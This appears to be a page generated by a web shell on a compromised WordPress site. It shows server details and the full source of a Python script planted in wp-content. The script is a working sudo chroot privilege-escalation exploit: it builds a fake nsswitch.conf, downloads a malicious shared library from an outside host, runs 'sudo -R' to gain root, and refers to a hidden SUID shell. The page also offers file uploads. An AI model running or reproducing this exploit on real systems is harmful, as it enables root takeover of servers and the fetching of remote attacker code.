HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: cssnetorguk (1024)
PHP: 8.2.28
Disabled: NONE
$ pwd: /home/fortest.org.uk/public_html/wp-content/
Upload Files
File: //home/fortest.org.uk/public_html/wp-content/2.py
import os
import sys
import subprocess
import shutil
from pathlib import Path
import urllib.request
#/usr/local/bin/.suidshell
def main():
    STAGE = "/tmp/sudo2root.stage"
    try:
	
        Path(STAGE).mkdir(parents=True, exist_ok=True)

        os.chdir(STAGE)
    except Exception as e:
        print(f"Failed to enter temp dir: {e}")
        sys.exit(1)

    Path("sudo2root/etc").mkdir(parents=True, exist_ok=True)
    Path("libnss_").mkdir(parents=True, exist_ok=True)

    nsswitch_path = Path("sudo2root/etc/nsswitch.conf")
    with nsswitch_path.open("w") as f:
        f.write("passwd: /sudo2root1337\n")

    try:
        shutil.copy("/etc/group", "sudo2root/etc")
    except Exception as e:
        print(f"Failed to copy /etc/group: {e}")
        sys.exit(1)

    url = "https://cse.my/sudo2root1337.so.2"
    dest_path = Path("libnss_/sudo2root1337.so.2")
    try:
        with urllib.request.urlopen(url) as response, open(dest_path, 'wb') as out_file:
            out_file.write(response.read())
    except Exception as e:
        print(f"Failed to download {url}: {e}")
        sys.exit(1)

    print("Launching exploit...")
	
    try:
        subprocess.run(["sudo", "-R", "sudo2root", "sudo2root"], check=True)
    except subprocess.CalledProcessError as e:
        print(f"Failed to launch exploit: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()
@ Telegram